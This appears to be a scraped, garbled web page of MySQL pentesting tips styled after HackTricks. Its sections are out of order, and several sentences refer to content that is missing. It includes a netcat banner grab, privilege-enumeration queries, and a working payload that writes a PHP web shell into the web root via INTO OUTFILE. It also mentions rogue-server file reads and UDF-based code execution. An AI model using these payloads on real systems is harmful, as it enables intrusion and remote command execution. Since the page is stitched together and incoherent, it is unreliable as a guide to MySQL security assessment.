Mysql Hacktricks Verified [2021] < Fully Tested >

If Nmap is unavailable, a simple Netcat connection will trigger the MySQL server to send its greeting banner, exposing the version string:

nc -nv <target-host> 3306

2. Authentication Bypasses and Misconfigurations

-- Check global privileges for the current user
SELECT * FROM information_schema.user_privileges WHERE grantee LIKE "'user'%";

-- Determine if the user has the crucial SUPER or FILE privilege
SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'FILE';

5. File System Interaction and Local File Inclusion (LFI)

This is often blocked in modern configurations, but it is a "first-check" priority for sensitive data like .env files or SSH keys.

Writing Files (INTO OUTFILE)

Before you can check a database, you must find it. This step is called scanning.

Detailed payloads for Union-based, Error-based, and Blind SQL injection to extract data.

Web applications should never connect to the database using administrative accounts. Create dedicated users with permissions restricted strictly to the required databases and tables, completely disabling global file privileges.

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Execute these standard queries to understand your privileges and the underlying operating system context:

The HackTricks MySQL Pentesting Guide provides a comprehensive methodology for identifying, enumerating, and exploiting MySQL services. The following sections detail the core techniques for interacting with MySQL as part of a security assessment.

1. External Enumeration & Connection

6. Privilege Escalation and RCE via UDFs

This is a goldmine for hacktricks users – it bypasses all file restrictions.

This is a classic but often overlooked technique. If you can trick an admin or app server into connecting to your malicious MySQL server, you can read arbitrary files from the client.

If successful, this loop breaks and grants an interactive MySQL shell as the root user.

Empty Root Passwords and Anonymous Accounts